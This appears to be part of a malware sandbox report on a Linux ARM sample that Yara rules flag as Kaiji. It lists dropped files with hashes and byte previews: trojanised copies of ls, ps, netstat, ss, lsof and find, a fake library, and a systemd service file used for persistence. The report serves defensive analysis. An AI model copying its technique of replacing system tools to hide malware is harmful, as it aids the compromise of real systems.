                                                                          MD5:2C3CEAC524F626B1EC1A9DA9D31EED3F
                                                                          SHA1:6D3F4E4F07C413937572B1C24807D4D8E3FE9729
                                                                          SHA-256:5AFF29FE14DAEC8DE51D3279C539B5F4A9A678B951DAE02F20028B6B43756CCB
                                                                          SHA-512:397292CA64E0083A0A71255A17E384677E6F9FD64C7F1E6932E00F300D1FA37C2FB3075DDC816D5032D592E3865085184D2A2E1FD5E0AB10176D13E64E4C7836
                                                                          Malicious:false
                                                                          Preview:5780.5780.

                                                                          /tmp/qemu-open.Yo4brb (deleted)

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):120
                                                                          Entropy (8bit):2.9188772313496707
                                                                          Encrypted:false
                                                                          SSDEEP:3:EfFeJMLIRaTUdVvX:EfkJMLIRaYdVf
                                                                          MD5:375D11B8F7A0EFE6186A83355BA054A2
                                                                          SHA1:72C0EDBD16C8E114CA2E13F91F3CE261B5E6570D
                                                                          SHA-256:1A542B2CB9F56B634B1786EB5870A71C7737420951D1D913FF83C987C35DC987
                                                                          SHA-512:48CA0D623F8F8D10C5BCDD0C6EA15C259F1E7C9FA9DF765EB1FEAAC9ADA7C96D08674124F1304E39A91850A129C70BBC19CEFAFC2A82D97762BCE02C162C2243
                                                                          Malicious:false
                                                                          Preview:5488 (/tmp/linux_arm6.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4294901136 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.

                                                                          /usr/bin/dir

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, Go BuildID=QWFqDvXFQJx9U3yrYPnA/M9zZFzD7RNozhwqfDdp2/4NamWS9qaPrrBZ2Ai_7G/E3zHuD-99wHqJg1owbs5, stripped
                                                                          Category:dropped
                                                                          Size (bytes):5242880
                                                                          Entropy (8bit):6.05036085544014
                                                                          Encrypted:false
                                                                          SSDEEP:24576:44v9ubX4NnJ+VWbqyUcN1Ib4zJqDu3WZZ+5YAKQqN02EXS3vUM6j0AJfuD/s3TW5:+VmmsDjfd5uBbTpHqufwmFp8qOTVI1
                                                                          MD5:C5F2DDE5DCA123520549BD745325FA64
                                                                          SHA1:2B154BF7D864B50F746348BC93044E8E939DBEE1
                                                                          SHA-256:B3F7CB72809A18EA6A45AC6658FAC539E2C066184485E041845D2E2F9949125F
                                                                          SHA-512:66AA8E660403689F1767899FE5423CECF9FCA44C9F3C8DF3937B4E6E87C147F6433FD530601D26F8781D8FFB39B26D3230360BF51632FF035913C9DC43E721C5
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_Kaiji_1, Description: Yara detected Kaiji, Source: /usr/bin/dir, Author: Joe Security
                                                                          Preview:.ELF..............(.........4...........4. ...(.........4...4...4...................................d...d.............................(...(...............)...*...*... ... ...............J...K...K..K..p...........Q.td...............................e.....................*....................................................................(.................].............*...).......................................4.....................e...........p.5.p.4.L...................o.............5...4.x...................y...........8.6.8.5.................................8.6.8.5....................5.............K...J.@...............................@.K.@.J.h.................................O...N..V...............................KP..KO.\!...............................lQ..lP..e..................C...................d.......................................................................................................................................................................................

                                                                          /usr/bin/find

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, Go BuildID=QWFqDvXFQJx9U3yrYPnA/M9zZFzD7RNozhwqfDdp2/4NamWS9qaPrrBZ2Ai_7G/E3zHuD-99wHqJg1owbs5, stripped
                                                                          Category:dropped
                                                                          Size (bytes):5242880
                                                                          Entropy (8bit):6.05036085544014
                                                                          Encrypted:false
                                                                          SSDEEP:24576:44v9ubX4NnJ+VWbqyUcN1Ib4zJqDu3WZZ+5YAKQqN02EXS3vUM6j0AJfuD/s3TW5:+VmmsDjfd5uBbTpHqufwmFp8qOTVI1
                                                                          MD5:C5F2DDE5DCA123520549BD745325FA64
                                                                          SHA1:2B154BF7D864B50F746348BC93044E8E939DBEE1
                                                                          SHA-256:B3F7CB72809A18EA6A45AC6658FAC539E2C066184485E041845D2E2F9949125F
                                                                          SHA-512:66AA8E660403689F1767899FE5423CECF9FCA44C9F3C8DF3937B4E6E87C147F6433FD530601D26F8781D8FFB39B26D3230360BF51632FF035913C9DC43E721C5
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_Kaiji_1, Description: Yara detected Kaiji, Source: /usr/bin/find, Author: Joe Security
                                                                          • Rule: JoeSecurity_Kaiji_1, Description: Yara detected Kaiji, Source: /usr/bin/find, Author: Joe Security
                                                                          Preview:.ELF..............(.........4...........4. ...(.........4...4...4...................................d...d.............................(...(...............)...*...*... ... ...............J...K...K..K..p...........Q.td...............................e.....................*....................................................................(.................].............*...).......................................4.....................e...........p.5.p.4.L...................o.............5...4.x...................y...........8.6.8.5.................................8.6.8.5....................5.............K...J.@...............................@.K.@.J.h.................................O...N..V...............................KP..KO.\!...............................lQ..lP..e..................C...................d.......................................................................................................................................................................................

                                                                          /usr/bin/include/dir

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=88509cf24745b54bfaf44487664f3c7647ca74d8, for GNU/Linux 3.2.0, stripped
                                                                          Category:dropped
                                                                          Size (bytes):142144
                                                                          Entropy (8bit):5.901302008465562
                                                                          Encrypted:false
                                                                          SSDEEP:1536:hfDyKo9d0mLrTpjQ2xioEbuGMC0kDLmLUFqpfgBLO+qDutbxHFb65RRnSULS0pJs:hDnGd0mxst7DLmg0OBLIupbn0pJqN
                                                                          MD5:079B45463B8B7F66D9EC2C24B2853FBE
                                                                          SHA1:20BF016B554AA799775CACD62328E8164DE2C811
                                                                          SHA-256:C8C68BF0B2D02D96EF345DB8718A5E85E19F6D25189686A945D7BA39AA0F2E39
                                                                          SHA-512:996347FDEC45C941D363F511F8BE56C000F91AD0FD9846273CA186AE7A40423A02B5F6F9C99AAB12F092916418A101E0DFA110F7AFFE11626E8EC9961292C7B8
                                                                          Malicious:true
                                                                          Preview:.ELF..............>......g......@........#..........@.8...@.............@.......@.......@........................................................................................................................6.......6.......................@.......@.......@.......5.......5..............................................P.......P................................ ....... ......X.......H%......................X.......X*......X*......................................8.......8.......8....... ....... .......................X.......X.......X.......D.......D...............S.td....8.......8.......8....... ....... ...............P.td....L.......L.......L.......,.......,...............Q.td....................................................R.td............. ....... ............................../lib64/ld-linux-x86-64.so.2.................GNU.............................GNU..P..GE.K..D.fO<vG.t.............GNU.........................o.............. .).b@....$...*I!. ...a..$...o.......q...r...u...z...

                                                                          /usr/bin/include/find

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=b8b9756abacab10f704aec42954e3fd2292f1e85, for GNU/Linux 3.2.0, stripped
                                                                          Category:dropped
                                                                          Size (bytes):320160
                                                                          Entropy (8bit):6.050007025938927
                                                                          Encrypted:false
                                                                          SSDEEP:3072:ohyHG3Khv1Ur3jv7lVYZRAfEFW654JUo65Cf4YAUEBn5pvOKYLpBdy4y0+pJhzj:og6jlWZReEFLCfZZab41U0g
                                                                          MD5:B68EF002F84CC54DD472238BA7DF80AB
                                                                          SHA1:3C326E1993103B601CB91DE8552CE5C0D9D159FF
                                                                          SHA-256:92A2BADE19A90A1BD81E4D2C2DE646DDF971ABA9C78DF6E31B2B567C94FDE175
                                                                          SHA-512:70CE3AB2CCFB1FADC603D524F3E4C11518F5C55BBE5BAAEF74DB50727FB77AD32D74CA09D09D2FF0CAE690FADD82966F622A83E0E3052F267AD1A74C26EE3E95
                                                                          Malicious:true
                                                                          Preview:.ELF..............>.....`.......@....... ...........@.8...@.............@.......@.......@........................................................................................................................j.......j.......................p.......p.......p.......1.......1.......................................................................................................(......h3...................... ....... ....... .......................................8.......8.......8....... ....... .......................X.......X.......X.......D.......D...............S.td....8.......8.......8....... ....... ...............P.td.....%.......%.......%..............................Q.td....................................................R.td..................................................../lib64/ld-linux-x86-64.so.2.................GNU.............................GNU...uj...pJ.B.N?.)/..............GNU.......................................@.R..>.H."... ............(........k...=.e.m.Pv...|

                                                                          /usr/bin/include/ls

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=2f15ad836be3339dec0e2e6a3c637e08e48aacbd, for GNU/Linux 3.2.0, stripped
                                                                          Category:dropped
                                                                          Size (bytes):142144
                                                                          Entropy (8bit):5.901203666912634
                                                                          Encrypted:false
                                                                          SSDEEP:1536:BgfDyKo9d0mLrTpjQ2xioEbuGMC0kDLmLUFqpfgBLO+qDutbxHFb65RRnSULS0pF:BADnGd0mxst7DLmg0OBLIupbn0pJqN
                                                                          MD5:E7793F15C2FF7E747B4BC7079F5CD4F7
                                                                          SHA1:732458574C63C3790CAD093A36EADFB990D11EE6
                                                                          SHA-256:1E39354A6E481DAC48375BFEBB126FD96AED4E23BAB3C53ED6ECF1C5E4D5736D
                                                                          SHA-512:233382698C722F0AF209865F7E998BC5A0A957CA8389E8A84BA4172F2413BEA1889DD79B12607D9577FD2FC17F300C8E7F223C2179F66786E5A11E28F4D68E53
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_Kaiji_1, Description: Yara detected Kaiji, Source: /usr/bin/include/ls, Author: Joe Security
                                                                          Preview:.ELF..............>......g......@........#..........@.8...@.............@.......@.......@........................................................................................................................6.......6.......................@.......@.......@.......5.......5..............................................P.......P................................ ....... ......X.......H%......................X.......X*......X*......................................8.......8.......8....... ....... .......................X.......X.......X.......D.......D...............S.td....8.......8.......8....... ....... ...............P.td....L.......L.......L.......,.......,...............Q.td....................................................R.td............. ....... ............................../lib64/ld-linux-x86-64.so.2.................GNU.............................GNU./...k.3....j<c~...............GNU.........................o.............. .).b@....$...*I!. ...a..$...o.......q...r...u...z...

                                                                          /usr/bin/include/lsof

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=b70e28f8c4071cf6da1a5d9bdf83301153a83a49, for GNU/Linux 3.2.0, stripped
                                                                          Category:dropped
                                                                          Size (bytes):175744
                                                                          Entropy (8bit):5.936169929539334
                                                                          Encrypted:false
                                                                          SSDEEP:3072:OF7SUSobvRwXmq4jOFFa5xMxlVUo2Ljy5frrI3ZaAZEWI4+Qap8AY8Vl/2eOmFW3:OMUSkymqiOFLL2Ljy5frrI3ZaAZEWI4+
                                                                          MD5:061386937EC7ACF924438A2643A32BE0
                                                                          SHA1:01A044B9E58839BEA3E58C66CB32ACC16241BF91
                                                                          SHA-256:8A26BBAE9EB85AA98EF29CFE5B0A291234DB6EB394C3E0C2841983DCF7DDA959
                                                                          SHA-512:2DE2E56AC4C32F47B4A1945CCFB0DB378E6D59019EE8004E3E5D2EC8935EFB5AA8EE14B8A0B21C61A267E195D42A3232A6DCADE8720DE06118FD579277F59DB7
                                                                          Malicious:true
                                                                          Preview:.ELF..............>.....`=......@...................@.8...@.............@.......@.......@.......................................................................................................................H%......H%.......................0.......0.......0....................................... ....... ....... ......Ps......Ps......................0.......0.......0.......x...............................h.......h.......h.......................................8.......8.......8....... ....... .......................X.......X.......X.......D.......D...............S.td....8.......8.......8....... ....... ...............P.td.....k.......k.......k......<.......<...............Q.td....................................................R.td....0.......0.......0.............................../lib64/ld-linux-x86-64.so.2.................GNU.............................GNU...(.......]..0.S.:I............GNU.........................p...................p...r.......(....e.m9..........................

                                                                          /usr/bin/include/netstat

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=51b4397f31c5992fa18047069bfa92ca1444ef99, stripped
                                                                          Category:dropped
                                                                          Size (bytes):158288
                                                                          Entropy (8bit):5.495895004028753
                                                                          Encrypted:false
                                                                          SSDEEP:1536:lVVZidyDSsOKijSMQHiubRaPuFzbCPopEjApaSH0YnYHAznwfoORW3yfrEjucVBF:fidyKKijokmQPHcpaSHyftW3XUsNTf
                                                                          MD5:D31D945767DD5A51E78FF0069533635F
                                                                          SHA1:64665A224F472B07778819F38FF5A300C1712EEB
                                                                          SHA-256:7AF5F6CDA055B65E31298FE20ED4456A87D2CA92803552BC0D3422F0E1A1FDA1
                                                                          SHA-512:8EFEB8DF05338ABBD4305FC48914A91012EDC91C2F6423BA59F4E54303C867DC7C5723EE94ADE118585AA6965CC888558E699533F4F9D5EEB22E45C57634A628
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_Kaiji_1, Description: Yara detected Kaiji, Source: /usr/bin/include/netstat, Author: Joe Security
                                                                          Preview:.ELF..............>.....P.......@.......Pc..........@.8...@.............@.......@.......@.......h.......h........................................................................................................p.......p..............................................}.......}...............................................h.......h........................0.......@.......@......h1.......E.......................J.......Z.......Z..............................................................D.......D...............P.td....................................................Q.td....................................................R.td.....0.......@.......@......P.......P.............../lib64/ld-linux-x86-64.so.2.............GNU.............................GNU.Q.9.1./..G......D.C...j..............0....4..%.....".p.^3...As@...t"0..R..2 ..(.....@%2..H3...!$.j...k.......o...q.......s...v...x...y...{...}...................................................................................................

                                                                          /usr/bin/include/ps

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=21b21cccacabfe9b0573bf0b894279a9502005b4, for GNU/Linux 3.2.0, stripped
                                                                          Category:dropped
                                                                          Size (bytes):137688
                                                                          Entropy (8bit):4.861913553163927
                                                                          Encrypted:false
                                                                          SSDEEP:1536:QQN5YhnrOag7gX/LBzGLEcQrAqgyz51Xs+9EEgG54MZszIWzbr63XrZOIhK5nn5F:QNXXFcsbsprg7Z9hK15IcKR4CS
                                                                          MD5:AB48054475A6F70F8E7FA847331F3327
                                                                          SHA1:83FEB47FF6E58A79152C2AD2882D6332751F4EA1
                                                                          SHA-256:6E1BE2FF79ADF6A05AD09B6DF87618A5F9857378A2978BEB1DEC12E20FD34844
                                                                          SHA-512:784A85F3758D18E23FDDD40A0DE6322B2C6CD63216C22433971A13522E18A34FCB3155AC400567DFEB32CCD54C2313731C8EFC712BF8FB9C05B2495DE1E5BF23
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_Kaiji_1, Description: Yara detected Kaiji, Source: /usr/bin/include/ps, Author: Joe Security
                                                                          Preview:.ELF..............>.............@.......X...........@.8...@.............@.......@.......@..............................................................................................................................................................................................................`.......`.......`.......c.......c......................p.......p.......p........A......xT..............................................................................8.......8.......8....... ....... .......................X.......X.......X.......D.......D...............S.td....8.......8.......8....... ....... ...............P.td....................................................Q.td....................................................R.td....p.......p.......p........@.......@............../lib64/ld-linux-x86-64.so.2.................GNU.............................GNU.!.......s...By.P ..............GNU.........................a............... ...a...d.......(....b&t.e.m.Pv..;O..bA..^~.9......

                                                                          /usr/bin/include/ss

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=78306939741bc1e7a074f53e1b6077eb0b275b76, for GNU/Linux 3.2.0, stripped
                                                                          Category:dropped
                                                                          Size (bytes):168800
                                                                          Entropy (8bit):5.521607353074361
                                                                          Encrypted:false
                                                                          SSDEEP:3072:5Wk6ydCmF77TznCsTYMW9mFtR6fm+CKlpzdc4BuiIdn:g/MvFfZ1N6ttzzdc4BuiId
                                                                          MD5:51D83131B398A97DD38555BA57084721
                                                                          SHA1:7D392A87F7DB787DFA85FBCDF2A5BA6F0B59B4ED
                                                                          SHA-256:E429F9D16A4CD64593B94DEE8309A427FE8CA57765BF0D2E7B822EFD123FE768
                                                                          SHA-512:ADC7137DF75410C2535986C1E86C2E92E58F9BEE70094F72F1F7ADF3DB125720CE281EB3F48474B0E192D672E96CBB1BC6E1EF6B26B10BF76A412C4516948216
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_Kaiji_1, Description: Yara detected Kaiji, Source: /usr/bin/include/ss, Author: Joe Security
                                                                          Preview:.ELF..............>......e......@...................@.8...@.............@.......@.......@........................................................................................................................;.......;.......................@.......@.......@.......o.......o..............................................................................0?......0O......0O......\K......H........................I.......Y.......Y......0.......0.......................8.......8.......8....... ....... .......................X.......X.......X.......D.......D...............S.td....8.......8.......8....... ....... ...............P.td....`.......`.......`.......T.......T...............Q.td....................................................R.td....0?......0O......0O............................../lib64/ld-linux-x86-64.so.2.................GNU.............................GNU.x0i9t...t.>.`w..'[v............GNU.........................................................(...4Btu.e.mfUa.9..2...............

                                                                          /usr/bin/ls

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, Go BuildID=QWFqDvXFQJx9U3yrYPnA/M9zZFzD7RNozhwqfDdp2/4NamWS9qaPrrBZ2Ai_7G/E3zHuD-99wHqJg1owbs5, stripped
                                                                          Category:dropped
                                                                          Size (bytes):5242880
                                                                          Entropy (8bit):6.05036085544014
                                                                          Encrypted:false
                                                                          SSDEEP:24576:44v9ubX4NnJ+VWbqyUcN1Ib4zJqDu3WZZ+5YAKQqN02EXS3vUM6j0AJfuD/s3TW5:+VmmsDjfd5uBbTpHqufwmFp8qOTVI1
                                                                          MD5:C5F2DDE5DCA123520549BD745325FA64
                                                                          SHA1:2B154BF7D864B50F746348BC93044E8E939DBEE1
                                                                          SHA-256:B3F7CB72809A18EA6A45AC6658FAC539E2C066184485E041845D2E2F9949125F
                                                                          SHA-512:66AA8E660403689F1767899FE5423CECF9FCA44C9F3C8DF3937B4E6E87C147F6433FD530601D26F8781D8FFB39B26D3230360BF51632FF035913C9DC43E721C5
                                                                          Malicious:true
                                                                          Preview:.ELF..............(.........4...........4. ...(.........4...4...4...................................d...d.............................(...(...............)...*...*... ... ...............J...K...K..K..p...........Q.td...............................e.....................*....................................................................(.................].............*...).......................................4.....................e...........p.5.p.4.L...................o.............5...4.x...................y...........8.6.8.5.................................8.6.8.5....................5.............K...J.@...............................@.K.@.J.h.................................O...N..V...............................KP..KO.\!...............................lQ..lP..e..................C...................d.......................................................................................................................................................................................

                                                                          /usr/bin/lsof

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, Go BuildID=QWFqDvXFQJx9U3yrYPnA/M9zZFzD7RNozhwqfDdp2/4NamWS9qaPrrBZ2Ai_7G/E3zHuD-99wHqJg1owbs5, stripped
                                                                          Category:dropped
                                                                          Size (bytes):5242880
                                                                          Entropy (8bit):6.05036085544014
                                                                          Encrypted:false
                                                                          SSDEEP:24576:44v9ubX4NnJ+VWbqyUcN1Ib4zJqDu3WZZ+5YAKQqN02EXS3vUM6j0AJfuD/s3TW5:+VmmsDjfd5uBbTpHqufwmFp8qOTVI1
                                                                          MD5:C5F2DDE5DCA123520549BD745325FA64
                                                                          SHA1:2B154BF7D864B50F746348BC93044E8E939DBEE1
                                                                          SHA-256:B3F7CB72809A18EA6A45AC6658FAC539E2C066184485E041845D2E2F9949125F
                                                                          SHA-512:66AA8E660403689F1767899FE5423CECF9FCA44C9F3C8DF3937B4E6E87C147F6433FD530601D26F8781D8FFB39B26D3230360BF51632FF035913C9DC43E721C5
                                                                          Malicious:true
                                                                          Preview:.ELF..............(.........4...........4. ...(.........4...4...4...................................d...d.............................(...(...............)...*...*... ... ...............J...K...K..K..p...........Q.td...............................e.....................*....................................................................(.................].............*...).......................................4.....................e...........p.5.p.4.L...................o.............5...4.x...................y...........8.6.8.5.................................8.6.8.5....................5.............K...J.@...............................@.K.@.J.h.................................O...N..V...............................KP..KO.\!...............................lQ..lP..e..................C...................d.......................................................................................................................................................................................

                                                                          /usr/bin/netstat

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, Go BuildID=QWFqDvXFQJx9U3yrYPnA/M9zZFzD7RNozhwqfDdp2/4NamWS9qaPrrBZ2Ai_7G/E3zHuD-99wHqJg1owbs5, stripped
                                                                          Category:dropped
                                                                          Size (bytes):5242880
                                                                          Entropy (8bit):6.05036085544014
                                                                          Encrypted:false
                                                                          SSDEEP:24576:44v9ubX4NnJ+VWbqyUcN1Ib4zJqDu3WZZ+5YAKQqN02EXS3vUM6j0AJfuD/s3TW5:+VmmsDjfd5uBbTpHqufwmFp8qOTVI1
                                                                          MD5:C5F2DDE5DCA123520549BD745325FA64
                                                                          SHA1:2B154BF7D864B50F746348BC93044E8E939DBEE1
                                                                          SHA-256:B3F7CB72809A18EA6A45AC6658FAC539E2C066184485E041845D2E2F9949125F
                                                                          SHA-512:66AA8E660403689F1767899FE5423CECF9FCA44C9F3C8DF3937B4E6E87C147F6433FD530601D26F8781D8FFB39B26D3230360BF51632FF035913C9DC43E721C5
                                                                          Malicious:true
                                                                          Preview:.ELF..............(.........4...........4. ...(.........4...4...4...................................d...d.............................(...(...............)...*...*... ... ...............J...K...K..K..p...........Q.td...............................e.....................*....................................................................(.................].............*...).......................................4.....................e...........p.5.p.4.L...................o.............5...4.x...................y...........8.6.8.5.................................8.6.8.5....................5.............K...J.@...............................@.K.@.J.h.................................O...N..V...............................KP..KO.\!...............................lQ..lP..e..................C...................d.......................................................................................................................................................................................

                                                                          /usr/bin/ps

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, Go BuildID=QWFqDvXFQJx9U3yrYPnA/M9zZFzD7RNozhwqfDdp2/4NamWS9qaPrrBZ2Ai_7G/E3zHuD-99wHqJg1owbs5, stripped
                                                                          Category:dropped
                                                                          Size (bytes):5242880
                                                                          Entropy (8bit):6.05036085544014
                                                                          Encrypted:false
                                                                          SSDEEP:24576:44v9ubX4NnJ+VWbqyUcN1Ib4zJqDu3WZZ+5YAKQqN02EXS3vUM6j0AJfuD/s3TW5:+VmmsDjfd5uBbTpHqufwmFp8qOTVI1
                                                                          MD5:C5F2DDE5DCA123520549BD745325FA64
                                                                          SHA1:2B154BF7D864B50F746348BC93044E8E939DBEE1
                                                                          SHA-256:B3F7CB72809A18EA6A45AC6658FAC539E2C066184485E041845D2E2F9949125F
                                                                          SHA-512:66AA8E660403689F1767899FE5423CECF9FCA44C9F3C8DF3937B4E6E87C147F6433FD530601D26F8781D8FFB39B26D3230360BF51632FF035913C9DC43E721C5
                                                                          Malicious:true
                                                                          Preview:.ELF..............(.........4...........4. ...(.........4...4...4...................................d...d.............................(...(...............)...*...*... ... ...............J...K...K..K..p...........Q.td...............................e.....................*....................................................................(.................].............*...).......................................4.....................e...........p.5.p.4.L...................o.............5...4.x...................y...........8.6.8.5.................................8.6.8.5....................5.............K...J.@...............................@.K.@.J.h.................................O...N..V...............................KP..KO.\!...............................lQ..lP..e..................C...................d.......................................................................................................................................................................................

                                                                          /usr/bin/ss

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, Go BuildID=QWFqDvXFQJx9U3yrYPnA/M9zZFzD7RNozhwqfDdp2/4NamWS9qaPrrBZ2Ai_7G/E3zHuD-99wHqJg1owbs5, stripped
                                                                          Category:dropped
                                                                          Size (bytes):5242880
                                                                          Entropy (8bit):6.05036085544014
                                                                          Encrypted:false
                                                                          SSDEEP:24576:44v9ubX4NnJ+VWbqyUcN1Ib4zJqDu3WZZ+5YAKQqN02EXS3vUM6j0AJfuD/s3TW5:+VmmsDjfd5uBbTpHqufwmFp8qOTVI1
                                                                          MD5:C5F2DDE5DCA123520549BD745325FA64
                                                                          SHA1:2B154BF7D864B50F746348BC93044E8E939DBEE1
                                                                          SHA-256:B3F7CB72809A18EA6A45AC6658FAC539E2C066184485E041845D2E2F9949125F
                                                                          SHA-512:66AA8E660403689F1767899FE5423CECF9FCA44C9F3C8DF3937B4E6E87C147F6433FD530601D26F8781D8FFB39B26D3230360BF51632FF035913C9DC43E721C5
                                                                          Malicious:true
                                                                          Preview:.ELF..............(.........4...........4. ...(.........4...4...4...................................d...d.............................(...(...............)...*...*... ... ...............J...K...K..K..p...........Q.td...............................e.....................*....................................................................(.................].............*...).......................................4.....................e...........p.5.p.4.L...................o.............5...4.x...................y...........8.6.8.5.................................8.6.8.5....................5.............K...J.@...............................@.K.@.J.h.................................O...N..V...............................KP..KO.\!...............................lQ..lP..e..................C...................d.......................................................................................................................................................................................

                                                                          /usr/lib/libgdi.so.0.8.1

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, Go BuildID=QWFqDvXFQJx9U3yrYPnA/M9zZFzD7RNozhwqfDdp2/4NamWS9qaPrrBZ2Ai_7G/E3zHuD-99wHqJg1owbs5, stripped
                                                                          Category:dropped
                                                                          Size (bytes):5242880
                                                                          Entropy (8bit):6.05036085544014
                                                                          Encrypted:false
                                                                          SSDEEP:24576:44v9ubX4NnJ+VWbqyUcN1Ib4zJqDu3WZZ+5YAKQqN02EXS3vUM6j0AJfuD/s3TW5:+VmmsDjfd5uBbTpHqufwmFp8qOTVI1
                                                                          MD5:C5F2DDE5DCA123520549BD745325FA64
                                                                          SHA1:2B154BF7D864B50F746348BC93044E8E939DBEE1
                                                                          SHA-256:B3F7CB72809A18EA6A45AC6658FAC539E2C066184485E041845D2E2F9949125F
                                                                          SHA-512:66AA8E660403689F1767899FE5423CECF9FCA44C9F3C8DF3937B4E6E87C147F6433FD530601D26F8781D8FFB39B26D3230360BF51632FF035913C9DC43E721C5
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_Kaiji_1, Description: Yara detected Kaiji, Source: /usr/lib/libgdi.so.0.8.1, Author: Joe Security
                                                                          Preview:.ELF..............(.........4...........4. ...(.........4...4...4...................................d...d.............................(...(...............)...*...*... ... ...............J...K...K..K..p...........Q.td...............................e.....................*....................................................................(.................].............*...).......................................4.....................e...........p.5.p.4.L...................o.............5...4.x...................y...........8.6.8.5.................................8.6.8.5....................5.............K...J.@...............................@.K.@.J.h.................................O...N..V...............................KP..KO.\!...............................lQ..lP..e..................C...................d.......................................................................................................................................................................................

                                                                          /usr/lib/system-mark

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, Go BuildID=QWFqDvXFQJx9U3yrYPnA/M9zZFzD7RNozhwqfDdp2/4NamWS9qaPrrBZ2Ai_7G/E3zHuD-99wHqJg1owbs5, stripped
                                                                          Category:dropped
                                                                          Size (bytes):5242880
                                                                          Entropy (8bit):6.05036085544014
                                                                          Encrypted:false
                                                                          SSDEEP:24576:44v9ubX4NnJ+VWbqyUcN1Ib4zJqDu3WZZ+5YAKQqN02EXS3vUM6j0AJfuD/s3TW5:+VmmsDjfd5uBbTpHqufwmFp8qOTVI1
                                                                          MD5:C5F2DDE5DCA123520549BD745325FA64
                                                                          SHA1:2B154BF7D864B50F746348BC93044E8E939DBEE1
                                                                          SHA-256:B3F7CB72809A18EA6A45AC6658FAC539E2C066184485E041845D2E2F9949125F
                                                                          SHA-512:66AA8E660403689F1767899FE5423CECF9FCA44C9F3C8DF3937B4E6E87C147F6433FD530601D26F8781D8FFB39B26D3230360BF51632FF035913C9DC43E721C5
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_Kaiji_1, Description: Yara detected Kaiji, Source: /usr/lib/system-mark, Author: Joe Security
                                                                          Preview:.ELF..............(.........4...........4. ...(.........4...4...4...................................d...d.............................(...(...............)...*...*... ... ...............J...K...K..K..p...........Q.td...............................e.....................*....................................................................(.................].............*...).......................................4.....................e...........p.5.p.4.L...................o.............5...4.x...................y...........8.6.8.5.................................8.6.8.5....................5.............K...J.@...............................@.K.@.J.h.................................O...N..V...............................KP..KO.\!...............................lQ..lP..e..................C...................d.......................................................................................................................................................................................

                                                                          /usr/lib/systemd/system/quotaoff.service

                                                                          Download File
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):186
                                                                          Entropy (8bit):4.795801274247707
                                                                          Encrypted:false
                                                                          SSDEEP:3:zMZa7kKXtERv+2AXTMikAdIgQ+NRs7WRA2Iav817WRA2IavpsRs7WRA2Iav2rSkc:z86XWRBADMD+ns7Hvx17Hv2sRs7HvtLc
                                                                          MD5:B02DE6CD28CD922B18D9D93375A70D8B
                                                                          SHA1:021426A5A2FF9EDC80BA5936C94B37525538885E
                                                                          SHA-256:D8D8E5CD33AA3450CD74C63716A02F3DFF39EFEF2836559F110BC93663B1380A
